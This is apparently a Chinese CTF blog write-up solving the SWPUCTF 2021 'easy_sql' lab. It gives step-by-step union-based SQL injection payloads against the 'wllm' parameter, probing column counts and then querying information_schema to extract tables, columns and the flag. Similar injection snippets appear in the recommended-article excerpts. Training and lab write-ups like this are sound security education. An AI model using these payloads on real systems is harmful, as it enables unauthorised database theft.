[SWPUCTF 2021 新生赛]easy_sql解题记录

最新推荐文章于 2024-08-03 18:15:56 发布
最新推荐文章于 2024-08-03 18:15:56 发布
阅读量567 收藏 9
点赞数 11
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80050903/article/details/135853865
版权

1、打开靶机

2、进入靶机

发现名字为参数是wllm,并且要求输入一些东西

首先输入?wllm=1,出现以下界面,说明回显正常

输入?wllm=1' ,出现报错,说明为字符型漏洞

分别输入

  ?wllm=1’ order by 3--+

  ?wllm=1’ order by 4--+

发现不存在4列,存在3列

输入?wllm=-1' union select 1,2,3--+查看回显

输入?wllm=-1' union select 1,2,database()--+

查看数据库

输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看test_db的表

输入?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段

输入 -1' union select 1,2,group_concat(id,flag) from test_tb--+ 

查看flag的字段,得到密码,解题完成

半夜汽笛,
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-随便注(easy_sql
weixin_51383898的博客
10-13 372
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错注入,被过滤了使用联合注入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠注入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
【NSSCTFeasy-sql
2301_80115024的博客
04-21 290
(之前做过类似题,就扒拉了一下题库,又找到了这一题练练手)先查看回显参数 /?wllm=1 如图判断字段数 /?wllm=-1' order by 3--+ /?wllm=-1' order by 4--+查询4时出现如图情况,因此有3个显示位查回显 /?wllm=-1' union select 1,2,3--+查表名 /?wllm=-1' union select 1,2,group_concat(table_name) f
[SWPUCTF 2021 新生]easy_sql
zoixsoadji的博客
05-06 1423
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
HP_Easy_Start.app.zip 惠普打印机客户端驱动
01-14
【HP Easy Start.app.zip - 惠普打印机客户端驱动】 HP Easy Start 是一款由惠普公司专门为Mac用户设计的应用程序,用于简化安装惠普打印机驱动的过程。这个压缩包文件`HP_Easy_Start.app.zip`包含了该应用程序的...
2021莲城杯比题包.zip
10-12
这个比很可能是一个网络安全技术挑战,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全模式,参者需要展示他们的信息安全技能,包括但不限于密码学、漏洞分析、逆向工程、网络侦查等。...
S7-1200 PLC技术参考文档easy_plus_V4.2版本.rar
07-01
《S7-1200 PLC技术参考文档easy_plus_V4.2版本》是一份针对西门子S7-1200可编程逻辑控制器(PLC)的详细技术资料,适用于V4.2版本。这份文档是工程师、技术人员以及自动化系统设计者的重要参考资料,它涵盖了S7-1200...
easy_VM.rar_easy
09-23
本文将深入探讨一款名为“easy_VM.rar”的简易虚拟机,该虚拟机专为Windows操作系统设计,虽然功能相对简单,但其核心原理和实现方式对于理解虚拟化技术的基础概念具有重要意义。 “easy_VM.rar”是一款轻量级的...
蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
最新发布
0xSec
08-03 184
蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
六一战队夺魁青少年CTF擂台2024_round1:Web与Pwn解题揭秘
青少年CTF擂台挑战2024第一轮(#round 1)是一项针对青少年的信息安全,参队伍sixone战队在本次比中取得了显著的成绩。比涵盖多种技术领域,包括Web应用安全(Web1到Web5)、逆向工程(Reverse1)、密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值